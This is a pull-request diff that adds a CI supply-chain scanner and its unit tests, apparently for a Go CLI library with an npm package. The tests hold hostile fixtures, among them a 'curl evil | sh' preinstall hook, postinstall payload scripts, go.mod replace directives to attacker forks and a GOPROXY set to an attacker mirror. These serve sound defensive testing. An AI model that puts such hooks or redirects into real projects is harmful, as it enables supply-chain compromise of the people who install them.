### PR TITLE
feat(ci): add supply-chain hardening (scan workflow + Greptile rules)

### DIFF
--- a/.github/scripts/verify-supply-chain/scan.py
+++ b/.github/scripts/verify-supply-chain/scan.py
@@ -48,8 +48,14 @@ def git_show(ref: str, path: str) -> str | None:
     return result.stdout if result.returncode == 0 else None
 
 
-def changed_files(base_ref: str, head_ref: str) -> list[tuple[str, str]]:
-    """Return [(status, path)] for files touched between base and head."""
+def changed_files(base_ref: str, head_ref: str) -> list[tuple[str, str, str | None]]:
+    """Return [(status, path, old_path)] for files touched between base and head.
+
+    old_path is non-None only for renames and copies (status R/C); the signal
+    layer uses it to fetch the file's pre-rename content from base, so that
+    e.g. R6 module-path drift can detect renames whose new module string also
+    starts with the canonical prefix.
+    """
     result = run_git(["diff", "--name-status", "-z", f"{base_ref}...{head_ref}"])
     if result.returncode != 0:
         print(result.stderr, file=sys.stderr)
@@ -59,7 +65,7 @@ def changed_files(base_ref: str, head_ref: str) -> list[tuple[str, str]]:
     if fields and fields[-1] == "":
         fields.pop()
 
-    entries: list[tuple[str, str]] = []
+    entries: list[tuple[str, str, str | None]] = []
     i = 0
     while i < len(fields):
         status = fields[i]
@@ -67,15 +73,14 @@ def changed_files(base_ref: str, head_ref: str) -> list[tuple[str, str]]:
         if not status:
             continue
         if status.startswith(("R", "C")):
-            # rename or copy: status, old_path, new_path
-            _ = fields[i]  # old path
+            old_path = fields[i]
             new_path = fields[i + 1]
             i += 2
-            entries.append((status[0], new_path))
+            entries.append((status[0], new_path, old_path))
         else:
             path = fields[i]
             i += 1
-            entries.append((status, path))
+            entries.append((status, path, None))
     return entries
 
 
@@ -151,8 +156,14 @@ def emit_annotation(f: signals.Finding) -> None:
 # ---------------------------------------------------------------------------
 
 
-def build_change(base_ref: str, head_ref: str, status: str, path: str) -> signals.FileChange:
-    base_content = None if status == "A" else git_show(base_ref, path)
+def build_change(
+    base_ref: str, head_ref: str, status: str, path: str, old_path: str | None
+) -> signals.FileChange:
+    # For renames/copies, the file's prior version lives at old_path on base.
+    # Treating it as a true rename (rather than "new file at new_path") lets
+    # signals like R6 compare base_module against head_module across the rename.
+    base_lookup_path = old_path if old_path else path
+    base_content = None if status == "A" else git_show(base_ref, base_lookup_path)
     head_content = None if status == "D" else git_show(head_ref, path)
     diff_added = added_lines(base_ref, head_ref, path) if head_content is not None else []
     return signals.FileChange(
@@ -165,10 +176,10 @@ def build_change(base_ref: str, head_ref: str, status: str, path: str) -> signal
 
 def scan(base_ref: str, head_ref: str, strict: bool) -> list[signals.Finding]:
     findings: list[signals.Finding] = []
-    for status, path in changed_files(base_ref, head_ref):
+    for status, path, old_path in changed_files(base_ref, head_ref):
         if not is_scoped(path):
             continue
-        change = build_change(base_ref, head_ref, status, path)
+        change = build_change(base_ref, head_ref, status, path, old_path)
         for finding in signals.run_signals(change):
             if strict and finding.severity == "advise":
                 finding = signals.Finding(

--- a/.github/scripts/verify-supply-chain/scan.py
+++ b/.github/scripts/verify-supply-chain/scan.py
@@ -1,0 +1,220 @@
+#!/usr/bin/env python3
+"""PR-time supply-chain scan for printing-press-library.
+
+Walks the diff between a base and head ref, dispatches each touched file to
+the signal catalog in signals.py, and emits GitHub Actions annotations.
+
+Exit code semantics:
+  0 — no block-severity findings.
+  1 — at least one block-severity finding.
+
+Advisory findings (notice) never affect exit code; --strict promotes them.
+
+Defends against attack shapes documented in
+docs/solutions/security/2026-05-supply-chain-hardening.md.
+"""
+
+from __future__ import annotations
+
+import argparse
+import subprocess
+import sys
+from pathlib import Path, PurePosixPath
+
+import signals
+
+
+REPO_ROOT = Path(__file__).resolve().parents[3]
+
+
+# ---------------------------------------------------------------------------
+# Git plumbing
+# ---------------------------------------------------------------------------
+
+
+def run_git(args: list[str]) -> subprocess.CompletedProcess[str]:
+    return subprocess.run(
+        ["git", *args],
+        cwd=REPO_ROOT,
+        check=False,
+        text=True,
+        stdout=subprocess.PIPE,
+        stderr=subprocess.PIPE,
+    )
+
+
+def git_show(ref: str, path: str) -> str | None:
+    result = run_git(["show", f"{ref}:{path}"])
+    return result.stdout if result.returncode == 0 else None
+
+
+def changed_files(base_ref: str, head_ref: str) -> list[tuple[str, str]]:
+    """Return [(status, path)] for files touched between base and head."""
+    result = run_git(["diff", "--name-status", "-z", f"{base_ref}...{head_ref}"])
+    if result.returncode != 0:
+        print(result.stderr, file=sys.stderr)
+        raise SystemExit(result.returncode)
+
+    fields = result.stdout.split("\0")
+    if fields and fields[-1] == "":
+        fields.pop()
+
+    entries: list[tuple[str, str]] = []
+    i = 0
+    while i < len(fields):
+        status = fields[i]
+        i += 1
+        if not status:
+            continue
+        if status.startswith(("R", "C")):
+            # rename or copy: status, old_path, new_path
+            _ = fields[i]  # old path
+            new_path = fields[i + 1]
+            i += 2
+            entries.append((status[0], new_path))
+        else:
+            path = fields[i]
+            i += 1
+            entries.append((status, path))
+    return entries
+
+
+def added_lines(base_ref: str, head_ref: str, path: str) -> list[tuple[int, str]]:
+    """Return [(line_number_in_head, content)] for lines added by the diff.
+
+    Uses unified=0 to keep the parser dead simple.
+    """
+    result = run_git(["diff", "--unified=0", "--no-color", f"{base_ref}...{head_ref}", "--", path])
+    if result.returncode != 0:
+        return []
+
+    added: list[tuple[int, str]] = []
+    head_line = 0
+    for raw in result.stdout.splitlines():
+        if raw.startswith("@@"):
+            # @@ -a,b +c,d @@
+            try:
+                plus = raw.split(" ")[2]  # "+c,d" or "+c"
+                head_line = int(plus[1:].split(",")[0])
+            except (IndexError, ValueError):
+                head_line = 0
+            continue
+        if raw.startswith("+++") or raw.startswith("---"):
+            continue
+        if raw.startswith("+"):
+            added.append((head_line, raw[1:]))
+            head_line += 1
+        elif raw.startswith(" "):
+            head_line += 1
+        # lines starting with "-" don't advance head_line under unified=0
+    return added
+
+
+# ---------------------------------------------------------------------------
+# Path scoping — short-circuit before doing any work on irrelevant files
+# ---------------------------------------------------------------------------
+
+
+def is_scoped(path: str) -> bool:
+    parts = PurePosixPath(path).parts
+    if len(parts) >= 3 and parts[0] == ".github" and parts[1] == "workflows":
+        return path.endswith((".yml", ".yaml"))
+    if signals.is_library_gomod(path):
+        return True
+    if signals.is_npm_package_json(path):
+        return True
+    return False
+
+
+# ---------------------------------------------------------------------------
+# Annotation emission
+# ---------------------------------------------------------------------------
+
+
+def annotation_escape(value: str) -> str:
+    return value.replace("%", "%25").replace("\r", "%0D").replace("\n", "%0A")
+
+
+def emit_annotation(f: signals.Finding) -> None:
+    kind = "error" if f.is_block() else "notice"
+    pieces = [f"file={f.path}"]
+    if f.line is not None:
+        pieces.append(f"line={f.line}")
+    pieces.append(f"title=supply-chain:{f.signal_id}")
+    head = ",".join(pieces)
+    body = annotation_escape(f"{f.message} | Fix: {f.remediation}")
+    print(f"::{kind} {head}::{body}")
+
+
+# ---------------------------------------------------------------------------
+# Main
+# ---------------------------------------------------------------------------
+
+
+def build_change(base_ref: str, head_ref: str, status: str, path: str) -> signals.FileChange:
+    base_content = None if status == "A" else git_show(base_ref, path)
+    head_content = None if status == "D" else git_show(head_ref, path)
+    diff_added = added_lines(base_ref, head_ref, path) if head_content is not None else []
+    return signals.FileChange(
+        path=path,
+        base_content=base_content,
+        head_content=head_content,
+        added_lines=diff_added,
+    )
+
+
+def scan(base_ref: str, head_ref: str, strict: bool) -> list[signals.Finding]:
+    findings: list[signals.Finding] = []
+    for status, path in changed_files(base_ref, head_ref):
+        if not is_scoped(path):
+            continue
+        change = build_change(base_ref, head_ref, status, path)
+        for finding in signals.run_signals(change):
+            if strict and finding.severity == "advise":
+                finding = signals.Finding(
+                    path=finding.path,
+                    line=finding.line,
+                    severity="block",
+                    signal_id=finding.signal_id + ".strict",
+                    message=finding.message + " [strict mode: promoted to block]",
+                    remediation=finding.remediation,
+                )
+            findings.append(finding)
+    return findings
+
+
+def main(argv: list[str] | None = None) -> int:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--base-ref", required=True, help="git ref for the diff base")
+    parser.add_argument("--head-ref", default="HEAD", help="git ref for the diff head")
+    parser.add_argument(
+        "--strict",
+        action="store_true",
+        help="promote advisory findings to block-severity (off by default)",
+    )
+    args = parser.parse_args(argv)
+
+    findings = scan(args.base_ref, args.head_ref, args.strict)
+
+    block_count = 0
+    for f in findings:
+        emit_annotation(f)
+        if f.is_block():
+            block_count += 1
+
+    if block_count:
+        print(
+            f"::error::supply-chain scan: {block_count} block-severity finding(s); see annotations above."
+        )
+        return 1
+
+    advisory_count = sum(1 for f in findings if not f.is_block())
+    if advisory_count:
+        print(f"::notice::supply-chain scan: {advisory_count} advisory finding(s); see annotations.")
+    else:
+        print("supply-chain scan: no findings.")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/.github/scripts/verify-supply-chain/scan_test.py
+++ b/.github/scripts/verify-supply-chain/scan_test.py
@@ -242,6 +242,17 @@ class IdTokenSignalTest(unittest.TestCase):
         self.assertEqual(len(findings), 1)
         self.assertTrue(findings[0].is_block())
 
+    def test_id_token_with_trailing_comment_blocks(self) -> None:
+        """Greptile-flagged edge case: `id-token: write  # justification` would
+        evade the strict end-of-line regex. Now allowed via optional trailing
+        comment in the regex."""
+        wf = "permissions:\n  id-token: write  # i promise this is fine\n"
+        findings = signals.signal_id_token_outside_allowlist(
+            _fc(".github/workflows/sneaky.yml", head=wf)
+        )
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
 
 class GomodReplaceSignalTest(unittest.TestCase):
     def test_replace_to_github_blocks(self) -> None:

--- a/.github/scripts/verify-supply-chain/scan_test.py
+++ b/.github/scripts/verify-supply-chain/scan_test.py
@@ -1,0 +1,561 @@
+#!/usr/bin/env python3
+"""Unit tests for the supply-chain scan.
+
+Run from this directory:
+    python3 -m unittest scan_test
+"""
+
+from __future__ import annotations
+
+import json
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+import textwrap
+import unittest
+from pathlib import Path
+
+import scan
+import signals
+
+
+def _fc(
+    path: str,
+    *,
+    base: str | None = None,
+    head: str | None = None,
+    added: list[tuple[int, str]] | None = None,
+) -> signals.FileChange:
+    """Quick FileChange builder for signal unit tests."""
+    return signals.FileChange(
+        path=path,
+        base_content=base,
+        head_content=head,
+        added_lines=added or [],
+    )
+
+
+# ---------------------------------------------------------------------------
+# Signal-level unit tests (no git needed — exercise pure logic)
+# ---------------------------------------------------------------------------
+
+
+class WorkflowTrustSignalTest(unittest.TestCase):
+    def test_pull_request_target_with_head_sha_ref_blocks(self) -> None:
+        wf = textwrap.dedent(
+            """
+            name: bad
+            on:
+              pull_request_target:
+            jobs:
+              x:
+                runs-on: ubuntu-latest
+                steps:
+                  - uses: actions/checkout@v4
+                    with:
+                      ref: ${{ github.event.pull_request.head.sha }}
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertIn("TanStack", findings[0].message)
+
+    def test_pull_request_target_with_head_ref_blocks(self) -> None:
+        wf = textwrap.dedent(
+            """
+            on:
+              pull_request_target:
+            jobs:
+              x:
+                steps:
+                  - uses: actions/checkout@v4
+                    with:
+                      ref: ${{ github.event.pull_request.head.ref }}
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+
+    def test_pull_request_target_with_refs_pull_merge_blocks(self) -> None:
+        wf = textwrap.dedent(
+            """
+            on: pull_request_target
+            jobs:
+              x:
+                steps:
+                  - uses: actions/checkout@v4
+                    with:
+                      ref: refs/pull/${{ github.event.number }}/merge
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+
+    def test_safe_pull_request_target_no_checkout_does_not_block(self) -> None:
+        """Mirrors the existing greptile-policy-gate.yml posture: pull_request_target,
+        no PR-head checkout, only API calls. Must NOT trigger."""
+        wf = textwrap.dedent(
+            """
+            on:
+              pull_request_target:
+            permissions:
+              checks: read
+              pull-requests: write
+            jobs:
+              gate:
+                runs-on: ubuntu-latest
+                steps:
+                  - run: gh api repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/policy.yml", head=wf))
+        self.assertEqual(findings, [])
+
+    def test_pull_request_target_with_safe_checkout_does_not_block(self) -> None:
+        """pull_request_target + actions/checkout but no `ref:` override (defaults
+        to base SHA) is safe."""
+        wf = textwrap.dedent(
+            """
+            on:
+              pull_request_target:
+            jobs:
+              x:
+                steps:
+                  - uses: actions/checkout@v4
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/ok.yml", head=wf))
+        self.assertEqual(findings, [])
+
+    def test_plain_pull_request_with_head_ref_does_not_block(self) -> None:
+        """pull_request (not _target) + head ref is fine — no elevated context."""
+        wf = textwrap.dedent(
+            """
+            on:
+              pull_request:
+            jobs:
+              x:
+                steps:
+                  - uses: actions/checkout@v4
+                    with:
+                      ref: ${{ github.event.pull_request.head.sha }}
+            """
+        )
+        findings = signals.signal_workflow_trust(_fc(".github/workflows/ci.yml", head=wf))
+        self.assertEqual(findings, [])
+
+
+class IdTokenSignalTest(unittest.TestCase):
+    def test_id_token_in_non_publish_workflow_blocks(self) -> None:
+        wf = "permissions:\n  id-token: write\n  contents: read\n"
+        findings = signals.signal_id_token_outside_allowlist(
+            _fc(".github/workflows/verify-skills.yml", head=wf)
+        )
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
+    def test_id_token_in_npm_publish_does_not_block(self) -> None:
+        wf = "permissions:\n  id-token: write\n  contents: read\n"
+        findings = signals.signal_id_token_outside_allowlist(
+            _fc(".github/workflows/npm-publish.yml", head=wf)
+        )
+        self.assertEqual(findings, [])
+
+    def test_no_id_token_does_not_block(self) -> None:
+        wf = "permissions:\n  contents: read\n"
+        findings = signals.signal_id_token_outside_allowlist(
+            _fc(".github/workflows/anything.yml", head=wf)
+        )
+        self.assertEqual(findings, [])
+
+
+class GomodReplaceSignalTest(unittest.TestCase):
+    def test_replace_to_github_blocks(self) -> None:
+        change = _fc(
+            "library/payments/kalshi/go.mod",
+            head="module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n\nreplace example.com/foo => github.com/attacker/fork v0.0.1\n",
+            added=[(3, "replace example.com/foo => github.com/attacker/fork v0.0.1")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertEqual(findings[0].signal_id, "gomod_replace_remote_target")
+
+    def test_replace_to_https_url_blocks(self) -> None:
+        change = _fc(
+            "library/payments/kalshi/go.mod",
+            head="...",
+            added=[(3, "replace foo => https://evil.example/foo v1.0.0")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
+    def test_replace_to_local_path_advises_only(self) -> None:
+        change = _fc(
+            "library/food-and-dining/foo/go.mod",
+            head="...",
+            added=[(3, "replace github.com/ledongthuc/pdf => ./third_party/stubs/pdf")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertFalse(findings[0].is_block())
+        self.assertEqual(findings[0].severity, "advise")
+        self.assertEqual(findings[0].signal_id, "gomod_replace_local_target")
+
+    def test_replace_to_parent_path_advises_only(self) -> None:
+        change = _fc(
+            "library/foo/bar/go.mod",
+            head="...",
+            added=[(3, "replace foo => ../../vendor/foo")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(len(findings), 1)
+        self.assertEqual(findings[0].severity, "advise")
+
+    def test_no_new_replace_does_not_fire(self) -> None:
+        """The diff has no added lines (e.g., reprint regenerates identical content) →
+        existing replace directives in head_content are not re-flagged."""
+        change = _fc(
+            "library/food-and-dining/ordertogo/go.mod",
+            head="module github.com/mvanhorn/printing-press-library/library/food-and-dining/ordertogo\n\nreplace github.com/browserutils/kooky => ./third_party/kooky\n",
+            added=[],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(findings, [])
+
+    def test_replace_outside_library_does_not_fire(self) -> None:
+        change = _fc(
+            "tools/generate-registry/go.mod",
+            head="...",
+            added=[(3, "replace foo => github.com/attacker/fork v1.0.0")],
+        )
+        findings = signals.signal_gomod_replace(change)
+        self.assertEqual(findings, [])
+
+
+class GoEnvOverrideSignalTest(unittest.TestCase):
+    def test_goproxy_in_workflow_blocks(self) -> None:
+        wf = "jobs:\n  x:\n    env:\n      GOPROXY: https://mirror.attacker.example\n"
+        findings = signals.signal_go_env_override(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
+    def test_goflags_blocks(self) -> None:
+        wf = "env:\n  GOFLAGS: -insecure\n"
+        findings = signals.signal_go_env_override(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+
+    def test_gonosumcheck_blocks(self) -> None:
+        wf = "env:\n  GONOSUMCHECK: '*'\n"
+        findings = signals.signal_go_env_override(_fc(".github/workflows/bad.yml", head=wf))
+        self.assertEqual(len(findings), 1)
+
+    def test_unrelated_env_does_not_fire(self) -> None:
+        wf = "env:\n  GO_VERSION: 1.22\n  CGO_ENABLED: 0\n"
+        findings = signals.signal_go_env_override(_fc(".github/workflows/ok.yml", head=wf))
+        self.assertEqual(findings, [])
+
+
+class NpmLifecycleSignalTest(unittest.TestCase):
+    def test_postinstall_added_blocks(self) -> None:
+        base = json.dumps({"name": "x", "scripts": {"build": "tsc"}})
+        head = json.dumps({"name": "x", "scripts": {"build": "tsc", "postinstall": "node ./mal.js"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("npm/package.json", base=base, head=head)
+        )
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+
+    def test_existing_prepublishonly_not_flagged(self) -> None:
+        """prepublishOnly is allowed (CI-only). Not in the watched set."""
+        base = json.dumps({"name": "x", "scripts": {"prepublishOnly": "npm test"}})
+        head = json.dumps({"name": "x", "scripts": {"prepublishOnly": "npm test && npm run build"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("npm/package.json", base=base, head=head)
+        )
+        self.assertEqual(findings, [])
+
+    def test_existing_postinstall_not_re_flagged(self) -> None:
+        """If a postinstall already existed on base (it doesn't here, but hypothetically),
+        modifying it should not fire — we only flag *added* lifecycle scripts."""
+        base = json.dumps({"scripts": {"postinstall": "node a.js"}})
+        head = json.dumps({"scripts": {"postinstall": "node b.js"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("npm/package.json", base=base, head=head)
+        )
+        self.assertEqual(findings, [])
+
+    def test_preinstall_added_blocks(self) -> None:
+        base = json.dumps({"scripts": {}})
+        head = json.dumps({"scripts": {"preinstall": "curl evil | sh"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("npm/package.json", base=base, head=head)
+        )
+        self.assertEqual(len(findings), 1)
+
+    def test_prepare_added_blocks(self) -> None:
+        base = json.dumps({"scripts": {}})
+        head = json.dumps({"scripts": {"prepare": "node ./build.js"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("npm/package.json", base=base, head=head)
+        )
+        self.assertEqual(len(findings), 1)
+
+    def test_outside_npm_package_json_does_not_fire(self) -> None:
+        head = json.dumps({"scripts": {"postinstall": "node ./mal.js"}})
+        findings = signals.signal_npm_lifecycle_script(
+            _fc("library/x/foo/promo/package.json", head=head)
+        )
+        self.assertEqual(findings, [])
+
+
+class ModulePathDriftSignalTest(unittest.TestCase):
+    PREFIX = "github.com/mvanhorn/printing-press-library/library/"
+
+    def test_drift_to_attacker_path_blocks(self) -> None:
+        base = f"module {self.PREFIX}payments/kalshi\n\ngo 1.22\n"
+        head = "module github.com/attacker/kalshi-fork\n\ngo 1.22\n"
+        change = _fc("library/payments/kalshi/go.mod", base=base, head=head)
+        findings = signals.signal_module_path_drift(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertEqual(findings[0].signal_id, "module_path_drift_on_existing_cli")
+
+    def test_canonical_path_unchanged_does_not_fire(self) -> None:
+        same = f"module {self.PREFIX}payments/kalshi\n\ngo 1.22\n"
+        change = _fc("library/payments/kalshi/go.mod", base=same, head=same)
+        findings = signals.signal_module_path_drift(change)
+        self.assertEqual(findings, [])
+
+    def test_new_cli_with_canonical_path_does_not_fire(self) -> None:
+        head = f"module {self.PREFIX}other/freshly-minted\n\ngo 1.22\n"
+        change = _fc("library/other/freshly-minted/go.mod", base=None, head=head)
+        findings = signals.signal_module_path_drift(change)
+        self.assertEqual(findings, [])
+
+    def test_new_cli_with_non_canonical_path_blocks(self) -> None:
+        head = "module github.com/someone-else/whatever\n\ngo 1.22\n"
+        change = _fc("library/other/freshly-minted/go.mod", base=None, head=head)
+        findings = signals.signal_module_path_drift(change)
+        self.assertEqual(len(findings), 1)
+        self.assertTrue(findings[0].is_block())
+        self.assertEqual(findings[0].signal_id, "module_path_noncanonical_on_new_cli")
+
+
+# ---------------------------------------------------------------------------
+# Integration test: real git repo, end-to-end scan invocation
+# ---------------------------------------------------------------------------
+
+
+class ScanIntegrationTest(unittest.TestCase):
+    """Exercise scan.main() against real git diffs in a tempdir repo.
+
+    This is the most expensive layer of testing but catches integration bugs
+    that signal-level unit tests can't (git-show invocation, diff parsing,
+    annotation emission, exit codes).
+    """
+
+    def setUp(self) -> None:
+        self.tmp = Path(tempfile.mkdtemp(prefix="verify-supply-chain-"))
+        self.addCleanup(lambda: shutil.rmtree(self.tmp))
+        self.old_root = scan.REPO_ROOT
+        scan.REPO_ROOT = self.tmp
+        self._git("init", "-q", "-b", "main")
+        self._git("config", "user.email", "test@example.com")
+        self._git("config", "user.name", "Test")
+        self._git("commit", "--allow-empty", "-q", "-m", "init")
+
+    def tearDown(self) -> None:
+        scan.REPO_ROOT = self.old_root
+
+    def _git(self, *args: str) -> subprocess.CompletedProcess[str]:
+        return subprocess.run(
+            ["git", *args],
+            cwd=self.tmp,
+            check=True,
+            text=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+        )
+
+    def _write(self, rel: str, content: str) -> None:
+        p = self.tmp / rel
+        p.parent.mkdir(parents=True, exist_ok=True)
+        p.write_text(content)
+
+    def _commit(self, message: str) -> None:
+        self._git("add", "-A")
+        self._git("commit", "-q", "--allow-empty", "-m", message)
+
+    def _run_scan(self, base: str = "main", head: str = "HEAD", strict: bool = False) -> int:
+        argv = ["--base-ref", base, "--head-ref", head]
+        if strict:
+            argv.append("--strict")
+        return scan.main(argv)
+
+    # -------- Happy paths --------
+
+    def test_clean_pr_no_findings(self) -> None:
+        """Bug fix to a CLI's internal/cli/ — no scoped files touched → exit 0."""
+        self._write("library/payments/kalshi/internal/cli/root.go", "package cli\n")
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write("library/payments/kalshi/internal/cli/root.go", "package cli\n// edit\n")
+        self._commit("tweak")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 0)
+
+    # -------- Block-tier shapes --------
+
+    def test_pr_target_with_head_checkout_fails(self) -> None:
+        self._write(".github/workflows/existing.yml", "on: push\n")
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            ".github/workflows/new.yml",
+            "on:\n  pull_request_target:\njobs:\n  x:\n    steps:\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n",
+        )
+        self._commit("add bad workflow")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_id_token_in_non_publish_workflow_fails(self) -> None:
+        self._write(".github/workflows/baseline.yml", "on: push\n")
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            ".github/workflows/baseline.yml",
+            "on: push\npermissions:\n  id-token: write\n",
+        )
+        self._commit("grant id-token")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_id_token_in_npm_publish_allowed(self) -> None:
+        self._write(".github/workflows/npm-publish.yml", "on: push\n")
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            ".github/workflows/npm-publish.yml",
+            "on: push\npermissions:\n  id-token: write\n",
+        )
+        self._commit("legitimate publishing OIDC")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 0)
+
+    def test_replace_to_github_in_library_gomod_fails(self) -> None:
+        gomod = "module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n\ngo 1.22\n"
+        self._write("library/payments/kalshi/go.mod", gomod)
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            "library/payments/kalshi/go.mod",
+            gomod + "\nreplace example.com/foo => github.com/attacker/fork v0.0.1\n",
+        )
+        self._commit("add malicious replace")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_replace_to_local_path_advises_but_does_not_fail(self) -> None:
+        gomod = "module github.com/mvanhorn/printing-press-library/library/food-and-dining/foo\n\ngo 1.22\n"
+        self._write("library/food-and-dining/foo/go.mod", gomod)
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            "library/food-and-dining/foo/go.mod",
+            gomod + "\nreplace github.com/ledongthuc/pdf => ./third_party/stubs/pdf\n",
+        )
+        self._commit("vendor a fork locally")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 0)
+
+    def test_existing_replace_directives_not_re_flagged(self) -> None:
+        """Regression guard: the existing ordertogo CLI's three replace directives
+        must NOT trip the scan when the PR doesn't touch that go.mod."""
+        gomod = (
+            "module github.com/mvanhorn/printing-press-library/library/food-and-dining/ordertogo\n"
+            "\ngo 1.22\n"
+            "replace github.com/browserutils/kooky => ./third_party/kooky\n"
+            "replace github.com/ledongthuc/pdf => ./third_party/stubs/pdf\n"
+            "replace github.com/orisano/pixelmatch => ./third_party/stubs/pixelmatch\n"
+        )
+        self._write("library/food-and-dining/ordertogo/go.mod", gomod)
+        self._write("library/food-and-dining/ordertogo/internal/cli/root.go", "package cli\n")
+        self._commit("baseline with existing replaces")
+        self._git("checkout", "-q", "-b", "feat/x")
+        # Touch ONLY internal Go source, not go.mod.
+        self._write(
+            "library/food-and-dining/ordertogo/internal/cli/root.go",
+            "package cli\n// edit\n",
+        )
+        self._commit("unrelated edit")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 0)
+
+    def test_goproxy_in_workflow_env_fails(self) -> None:
+        self._write(".github/workflows/baseline.yml", "on: push\n")
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            ".github/workflows/baseline.yml",
+            "on: push\njobs:\n  x:\n    env:\n      GOPROXY: https://mirror.attacker.example\n",
+        )
+        self._commit("redirect GOPROXY")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_postinstall_added_to_npm_fails(self) -> None:
+        base = {"name": "@mvanhorn/printing-press", "scripts": {"build": "tsc"}}
+        head = {"name": "@mvanhorn/printing-press", "scripts": {"build": "tsc", "postinstall": "node ./payload.js"}}
+        self._write("npm/package.json", json.dumps(base, indent=2))
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write("npm/package.json", json.dumps(head, indent=2))
+        self._commit("add postinstall")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_module_path_drift_fails(self) -> None:
+        base = "module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n\ngo 1.22\n"
+        head = "module github.com/attacker/kalshi-fork\n\ngo 1.22\n"
+        self._write("library/payments/kalshi/go.mod", base)
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write("library/payments/kalshi/go.mod", head)
+        self._commit("rewrite module path")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 1)
+
+    def test_new_cli_canonical_module_path_passes(self) -> None:
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/new-cli")
+        self._write(
+            "library/other/freshly-minted/go.mod",
+            "module github.com/mvanhorn/printing-press-library/library/other/freshly-minted\n\ngo 1.22\n",
+        )
+        self._commit("add new CLI")
+        rc = self._run_scan(base="main")
+        self.assertEqual(rc, 0)
+
+    def test_strict_mode_promotes_advise_to_block(self) -> None:
+        gomod = "module github.com/mvanhorn/printing-press-library/library/food-and-dining/foo\n\ngo 1.22\n"
+        self._write("library/food-and-dining/foo/go.mod", gomod)
+        self._commit("baseline")
+        self._git("checkout", "-q", "-b", "feat/x")
+        self._write(
+            "library/food-and-dining/foo/go.mod",
+            gomod + "\nreplace foo => ./vendor/foo\n",
+        )
+        self._commit("local replace")
+        rc = self._run_scan(base="main", strict=False)
+        self.assertEqual(rc, 0)
+        rc = self._run_scan(base="main", strict=True)
+        self.assertEqual(rc, 1)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/.github/scripts/verify-supply-chain/scan_test.py
+++ b/.github/scripts/verify-supply-chain/scan_test.py
@@ -236,6 +236,94 @@ class GomodReplaceSignalTest(unittest.TestCase):
         findings = signals.signal_gomod_replace(change)
         self.assertEqual(findings, [])
 
+    def test_block_form_replace_to_github_blocks(self) -> None:
+        """Greptile-flagged evasion case: block-form `replace ( ... )` body lines
+        have no leading `replace` keyword. Must still trip the BufferZoneCorp gate."""
+        head = (
+            "module github.com/mvanhorn/printing-press-library/library/payments/kalshi\n"
+            "\n"
+            "go 1.22\n"
+            "\n"
+            "replace (\n"
+            "    example.com/foo => github.com/attacker/fork v0.0.1\n"
+            ")\n"
+        )
